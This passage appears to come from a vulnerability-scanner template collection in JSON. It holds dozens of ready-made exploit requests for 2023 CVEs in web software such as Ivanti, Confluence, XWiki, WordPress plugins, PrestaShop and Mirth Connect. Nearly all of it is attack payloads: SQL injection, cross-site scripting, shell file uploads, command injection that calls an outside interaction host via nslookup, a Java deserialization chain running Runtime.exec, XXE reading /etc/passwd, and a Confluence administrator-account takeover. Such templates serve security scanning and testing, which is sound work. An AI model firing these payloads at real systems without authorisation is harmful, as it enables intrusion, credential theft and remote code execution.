\"><img src=a onerror=alert(document.cookie)>s9a64\") && contains(body, \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-41763","info":{"name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /lwa/Webpages/LwaClient.aspx?meeturl={{base64(ssrfpayload)}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Skype"]}]}]},{"id":"CVE-2023-32563","info":{"name":"Ivanti Avalanche - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /Servlet/Skins HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 333\nContent-Type: multipart/form-data; boundary=------------------------eacf31f23ac1829f\nConnection: close\n\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"guid\"\n\n../../../Web/webapps/ROOT\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\n\n<%\nout.println(\"CVE-2023-32563\");\n%>\n--------------------------eacf31f23ac1829f--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2023-32563"]}]}]},{"id":"CVE-2023-1362","info":{"name":"unilogies/bumsys < v2.0.2 - Clickjacking","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","!regex('X-Frame-Options', header)","contains(body, 'BUM</b>Sys</a>')"],"condition":"and"}]}]},{"id":"CVE-2023-23333","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nGET /downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["33332-3202-EVC"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37265","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Internal IP","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"X-Forwarded-For":"127.0.0.1"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-31465","info":{"name":"TimeKeeper by FSMLabs - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).{{interactsh-url}}%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22{{Hostname}}%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"seriesID\":"]}]}]},{"id":"CVE-2023-26469","info":{"name":"Jorani 1.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /session/login HTTP/1.1\nHost: {{Hostname}}\n","POST /session/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword\n","GET /pages/view/log-{{date_time(\"%Y-%M-%D\")}} HTTP/1.1\nHost: {{Hostname}}\nX-REQUESTED-WITH: XMLHttpRequest\n{{header}}: CVE-2023-26469\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["7cca0844e81cd333152def045fe075c2"]},{"type":"status","part":"header_3","status":[401]}],"extractors":[{"type":"regex","part":"body","group":1,"internal":true,"name":"csrf","regex":["name=\"csrf_test_jorani\" value=\"(.*?)\""]}]}]},{"id":"CVE-2023-27847","info":{"name":"PrestaShop xipblog - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_any(tolower(response), \"prestashop\", \"xipblog\")"],"internal":true}]},{"raw":["@timeout: 20s\nGET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post\"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}})),NULL,NULL--+- HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post\"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(6)))AuDU)--+lafl HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"host-redirects":true,"matchers":[{"type":"word","name":"union-based","part":"body_1","words":["{{md5({{num}})}}"]},{"type":"dsl","name":"time-based","dsl":["duration_2>=6"]}]}]},{"id":"CVE-2023-26360","info":{"name":"Unauthenticated File Read Adobe ColdFusion","severity":"high"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password=","encrypted=true","adobe"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-6063","info":{"name":"WP Fastest Cache 1.2.2 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"WP Fastest Cache\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nGET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nCookie: wordpress_logged_in=\" AND (SELECT 5025 FROM (SELECT(SLEEP(7)))NkcI) AND \"tqKU\"=\"tqKU\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(body, \"/wp-\")"],"condition":"and"}]}]},{"id":"CVE-2023-29506","info":{"name":"XWiki >= 13.10.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/authenticate/wiki/xwiki%22onload=%22alert(document.domain)%22/resetpassword"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wiki-xwiki\"onload=\"alert(document.domain)\"","resetPasswordForm"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2272","info":{"name":"Tiempo.com <= 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Tiempo\")"],"condition":"and"}]}]},{"id":"CVE-2023-38040","info":{"name":"Revive Adserver 5.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"body","words":["Revive Adserver"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/www/delivery/al.php?zoneid=1&layerstyle=geocities&closetext=%3Cscript%3Ealert(document.domain);%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1434","info":{"name":"Odoo - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","\"params\":","session"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39677","info":{"name":"PrestaShop MyPrestaModules - PhpInfo Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/simpleimportproduct/send.php?phpinfo=1","{{BaseURL}}/modules/updateproducts/send.php?phpinfo=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"]}]}]},{"id":"CVE-2023-1020","info":{"name":"Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","no_participation"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3521","info":{"name":"FOSSBilling < 0.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /admin?_url=%2Fadmin&date_to='\"><img+src=x+onerror=alert(3)>&date_from='\"><img+src=x+onerror=alert(3)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(3)>","FOSSBilling"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38992","info":{"name":"Jeecg-Boot v3.5.1 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{path}}sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username","{{BaseURL}}/{{path}}sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username"],"payloads":{"path":[null,"jeecg-boot/"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body, \"parentId\\\":\", \"key\\\":\", \"{\\\"title\", \"success\\\":true\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27032","info":{"name":"PrestaShop AdvancedPopupCreator - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout 20s\nPOST /module/advancedpopupcreator/popup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\navailablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code == 200","contains(content_type, \"text/html\")","contains_all(body, 'popups','hasError')"],"condition":"and"}],"extractors":[{"type":"regex","name":"time","group":1,"regex":[",\"time\":([0-9]+),"],"internal":true},{"type":"regex","name":"token","group":1,"regex":[",\"static_token\":\"([0-9a-z]+)\","],"internal":true}]}]},{"id":"CVE-2023-52085","info":{"name":"Winter CMS Local File Inclusion - (LFI)","severity":"medium"},"requests":[{"raw":["GET /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\n","POST /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_token={{_token}}&postback=1&login={{username}}&password={{password}}\n","POST /backend/system/mailbrandsettings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-WINTER-REQUEST-HANDLER: onSave\nX-WINTER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_token={{_token}}&MailBrandSetting%5Bbody_bg%5D=%2342445B;@import%20(inline)%20%22/etc/passwd%22&redirect=0\n","GET /backend/system/mailbrandsettings HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"regex","part":"body_4","regex":["root:[x*]:0:0:"]}],"extractors":[{"type":"regex","part":"body","name":"_token","group":1,"regex":["<input name=\"_token\" type=\"hidden\" value=\"([0-9a-zA-Z]{40})\">"],"internal":true}]}]},{"id":"CVE-2023-0678","info":{"name":"PHPIPAM <v1.5.1 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/functions/scripts/find_full_subnets.php"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Array\", \"[subnet]\", \"[description]\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-46805","info":{"name":"Ivanti ICS - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1\nHost: {{Hostname}}\n","GET /api/v1/cav/client/status/../../admin/options HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"build\")","contains(body_1, \"system-information\")","contains(body_1, \"software-inventory\")","contains(header_1, \"application/json\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"poll_interval\")","contains(body_2, \"block_message\")","contains(header_2, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2023-36346","info":{"name":"POS Codekop v2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/print.php?nm_member=<script>alert(document.location)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.location)</script>","<title>print</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34754","info":{"name":"Bloofox v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","POST /admin/index.php?mode=settings&page=plugins&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstatus=1&pid=14'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+Ptkr%26send%3dSave&send=Save\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","contains_all(body_2, \"Active</option>\", \"Inactive</option>\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27524","info":{"name":"Apache Superset - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v1/database/{{path}} HTTP/1.1\nHost: {{Hostname}}\nCookie: session={{session}}\n"],"payloads":{"path":["1","2","3","4","5","6","7","9","10"],"session":["eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"configuration_method\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43208","info":{"name":"NextGen Healthcare Mirth Connect - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/server/version HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\n","POST /api/users HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\nContent-Type: application/xml\n\n<sorted-set>\n  <string>abcd</string>\n  <dynamic-proxy>\n    <interface>java.lang.Comparable</interface>\n    <handler class=\"org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler\">\n      <target class=\"org.apache.commons.collections4.functors.ChainedTransformer\">\n        <iTransformers>\n          <org.apache.commons.collections4.functors.ConstantTransformer>\n            <iConstant class=\"java-class\">java.lang.Runtime</iConstant>\n          </org.apache.commons.collections4.functors.ConstantTransformer>\n          <org.apache.commons.collections4.functors.InvokerTransformer>\n            <iMethodName>getMethod</iMethodName>\n            <iParamTypes>\n              <java-class>java.lang.String</java-class>\n              <java-class>[Ljava.lang.Class;</java-class>\n            </iParamTypes>\n            <iArgs>\n              <string>getRuntime</string>\n              <java-class-array/>\n            </iArgs>\n          </org.apache.commons.collections4.functors.InvokerTransformer>\n          <org.apache.commons.collections4.functors.InvokerTransformer>\n            <iMethodName>invoke</iMethodName>\n            <iParamTypes>\n              <java-class>java.lang.Object</java-class>\n              <java-class>[Ljava.lang.Object;</java-class>\n            </iParamTypes>\n            <iArgs>\n              <null/>\n              <object-array/>\n            </iArgs>\n          </org.apache.commons.collections4.functors.InvokerTransformer>\n          <org.apache.commons.collections4.functors.InvokerTransformer>\n            <iMethodName>exec</iMethodName>\n            <iParamTypes>\n              <java-class>java.lang.String</java-class>\n            </iParamTypes>\n            <iArgs>\n              <string>nslookup {{interactsh-url}}</string>\n            </iArgs>\n          </org.apache.commons.collections4.functors.InvokerTransformer>\n        </iTransformers>\n      </target>\n      <methodName>transform</methodName>\n      <eventTypes>\n        <string>compareTo</string>\n      </eventTypes>\n    </handler>\n  </dynamic-proxy>\n</sorted-set>\n"],"matchers":[{"type":"dsl","dsl":["compare_versions(version, \"<4.4.1\")","contains(interactsh_protocol, \"dns\")","status_code_1 == 200 && status_code_2 == 500"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"version","group":1,"regex":["(.*)"],"internal":true}]}]},{"id":"CVE-2023-0448","info":{"name":"WP Helper Lite < 4.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"><svg onload=alert(document.domain)>\")","contains(body, \"params\\\":{\\\"action\")"],"condition":"and"}]}]},{"id":"CVE-2023-40749","info":{"name":"PHPJabbers Food Delivery Script v3.0 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3d(SELECT+(CASE+WHEN+(4213%3d4213)+THEN+0x63726561746564+ELSE+(SELECT+7877+UNION+SELECT+7153)+END))%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d\u2019\u2019%26type%3d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["class <strong>pjAdminOrdersaction","didn't exists"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22515","info":{"name":"Atlassian Confluence - Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /setup/setupadministrator-start.action HTTP/1.1\nHost: {{Hostname}}\n","GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n","GET /setup/setupadministrator-start.action HTTP/1.1\nHost: {{Hostname}}\n","@timeout:20s\nPOST /setup/setupadministrator.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\nusername={{to_lower(username)}}&fullName=admin&email={{email}}.com&password={{password}}&confirm={{password}}&setup-next-button=Next\n","POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\nos_username={{to_lower(username)}}&os_password={{password}}&login=Log+in&os_destination=%2Findex.action\n","GET /welcome.action HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, 'Setup is already complete')","contains(body_3, 'Please configure the system administrator account for this Confluence installation')","contains(location_5, '/index.action')","status_code_5 == 302","contains(body_6, 'Administration')"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2023-37462","info":{"name":"XWiki Platform - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view","{{BaseURL}}/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki"],"skip-variables-check":true,"extractors":[{"type":"regex","group":1,"name":"id","regex":["data-xwiki-async-client-id=\"(.+?)\""],"internal":true},{"type":"regex","group":1,"name":"url","regex":["<span class=\"xwiki-async\" data-xwiki-async-id=\"(.+?)\""],"internal":true}],"matchers":[{"type":"dsl","dsl":["body_2 == \"31557644536232\"","contains(header_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-25194","info":{"name":"Apache Druid Kafka Connect - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"type\":\"kafka\",\n    \"spec\":{\n        \"type\":\"kafka\",\n        \"ioConfig\":{\n            \"type\":\"kafka\",\n            \"consumerProperties\":{\n                \"bootstrap.servers\":\"127.0.0.1:6666\",\n                \"sasl.mechanism\":\"SCRAM-SHA-256\",\n                \"security.protocol\":\"SASL_SSL\",\n                \"sasl.jaas.config\":\"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\\\"rmi://{{interactsh-url}}:6666/test\\\" useFirstPass=\\\"true\\\" serviceName=\\\"x\\\" debug=\\\"true\\\" group.provider.url=\\\"xxx\\\";\"\n            },\n            \"topic\":\"test\",\n            \"useEarliestOffset\":true,\n            \"inputFormat\":{\n                \"type\":\"regex\",\n                \"pattern\":\"([\\\\s\\\\S]*)\",\n                \"listDelimiter\":\"56616469-6de2-9da4-efb8-8f416e6e6965\",\n                \"columns\":[\n                    \"raw\"\n                ]\n            }\n        },\n        \"dataSchema\":{\n            \"dataSource\":\"sample\",\n            \"timestampSpec\":{\n                \"column\":\"!!!_no_such_column_!!!\",\n                \"missingValue\":\"1970-01-01T00:00:00Z\"\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"granularitySpec\":{\n                \"rollup\":false\n            }\n        },\n        \"tuningConfig\":{\n            \"type\":\"kafka\"\n        }\n    },\n    \"samplerConfig\":{\n        \"numRows\":500,\n        \"timeoutMs\":15000\n    }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["RecordSupplier"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-48777","info":{"name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/post.php?post=1&action=elementor HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nactions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax\n","GET /wp-content/{{filename}}.php?cmd=cat+/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_4)","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","internal":true,"name":"nonce","part":"body","group":1,"regex":["admin\\\\\\/admin\\-ajax\\.php\",\"nonce\":\"([0-9a-z]+)\""]}]}]},{"id":"CVE-2023-4521","info":{"name":"Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Import XML and RSS Feeds"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-42344","info":{"name":"OpenCMS - XML external entity (XXE)","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/opencms/cmisatom/cmis-online/query","{{BaseURL}}/cmisatom/cmis-online/query"],"headers":{"Content-Type":"application/xml;charset=UTF-8","Referer":"{{RootURL}}"},"body":"<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis=\"<http://docs.oasis-open.org/ns/cmis/core/200908/>\"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>\n","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","invalidArgument"],"condition":"and"}]}]},{"id":"CVE-2023-24733","info":{"name":"PMB 7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>@"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34105","info":{"name":"SRS - Command Injection","severity":"high"},"requests":[{"raw":["POST /api/v1/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"action\":  \"on_publish\", \"app\":  \"`nslookup {{interactsh-url}}`\", \"stream\":\"foo\", \"vhost\": \"foo\", \"client_id\":\"foo\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"code\":","data\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33440","info":{"name":"Faculty Evaluation System v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=save_user HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------1037163726497\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"id\"\n\n1\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"firstname\"\n\nAdministrator\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"lastname\"\n\na\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"email\"\n\n{{email}}\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"password\"\n\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"cpass\"\n\n\n-----------------------------1037163726497--\n","GET /login.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","regex(\"^1$\", body_1)","!regex(\"^2$\", body_1)","len(body_1) == 1","contains(body_2, \"Faculty Evaluation\")"],"condition":"and"}]}]},{"id":"CVE-2023-25157","info":{"name":"GeoServer OGC Filter - SQL Injection","severity":"critical"},"requests":[{"raw":["GET 